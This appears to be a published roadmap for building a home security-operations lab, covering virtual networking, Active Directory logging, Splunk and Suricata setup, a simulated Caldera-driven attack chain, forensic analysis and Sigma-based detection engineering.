Project Implementation Roadmap
📅 Published: 2026-05-21 23:49 | 🔄 Last Updated: 2026-05-21 23:52
Project Implementation Roadmap​
Phase 1: Establishing the Foundation (Virtual Infrastructure)
- Objective: Deploy a functional LAN and SIEM environment, ensuring network visibility and connectivity between virtual machines.
- Tasks:
- Configure VMnet2 (LAN) and VMnet3 (SIEM) using the VMware Virtual Network Editor.
- Install pfSense: Configure three interfaces (WAN, LAN, and SIEM). Establish baseline Firewall Rules to permit log forwarding from the LAN to the SIEM.
- Install Base Operating Systems: Windows Server 2022 (for DC01) and Windows 10/11 (for WS01).
Phase 2: Active Directory Deployment & Logging Hardening
- Objective: Transition from standalone machines to a centrally managed enterprise environment.
- Tasks:
- Promote DC01 to a Domain Controller and join WS01 to the domain.
- Configure Group Policy Objects (GPO): Enable advanced logging capabilities, including Command Line Auditing and PowerShell Script Block Logging.
- Deploy Sysmon on both Windows machines utilizing a standardized configuration template (e.g., SwiftOnSecurity or Sysmon-modular by Olaf Hartong).
Phase 3: Log Pipeline Configuration (The Heart of the SOC)
- Objective: Ensure Windows telemetry is successfully ingested and visualized on the Splunk dashboard.
- Tasks:
- Deploy the Splunk Server (running Splunk via Docker on an Ubuntu VM).
- Install the Splunk Universal Forwarder (SUF) on both DC01 and WS01.
- Configure inputs.conf to forward Sysmon and Windows Event logs to Splunk via port 9997.
- Verify data ingestion within Splunk using basic SPL (Search Processing Language) queries.
Phase 4: Network Security & IDS (Intrusion Detection System)
- Objective: Monitor and analyze network traffic traversing different network segments.
- Tasks:
- Install the Suricata package on pfSense and configure it to inspect traffic on the LAN interface.
- Configure log forwarding from pfSense to Splunk (utilizing Syslog or a dedicated Splunk Add-on).
- Validation: Execute test commands to simulate malicious activity and verify that Suricata alerts are successfully indexed in Splunk.
- Configure OpenVPN on pfSense to establish a secure connection for the SOC analyst's machine.
Phase 5: Attack Execution Phase
- Objective: Successfully execute all 11 steps of the attack playbook and gather forensic evidence.
- Tasks:
- Deploy a Command and Control (C2) Server (Caldera) on a Kali Linux instance.
- Sequentially execute the 11-step attack playbook: ranging from initial Phishing delivery -> Privilege Escalation -> Lateral Movement -> Ransomware deployment.
- Critical Step: After executing each stage of the attack, pause and pivot to Splunk to identify the newly generated logs. Capture screenshots of these logs to serve as documented forensic evidence.
Phase 6: Analysis & Final Incident Report
- Objective: Translate raw telemetry into a cohesive, presentable forensic investigation project.
- Tasks:
- Conduct Investigation: Analyze Windows Event logs (e.g., Event IDs 4624, 7045, 4698, 4104) and Sysmon telemetry for threat hunting. Perform RAM and disk memory dumps, utilizing tools like Volatility 2/3, FTK Imager, and the Eric Zimmerman (EZ) Tools suite for deep forensic analysis.
- Draft the Incident Report: Map each phase of the attack lifecycle to the MITRE ATT&CK framework, providing detailed explanations of the detection methodology based on the acquired logs.
Phase 7: Detection Engineering
- Objective: Develop and implement proactive detection rules to identify and prevent future attacks exhibiting similar behavioral patterns.
- Tasks:
- Write Sigma rules.
- Develop advanced SPL detection queries.
- Configure Correlation rules within the SIEM environment.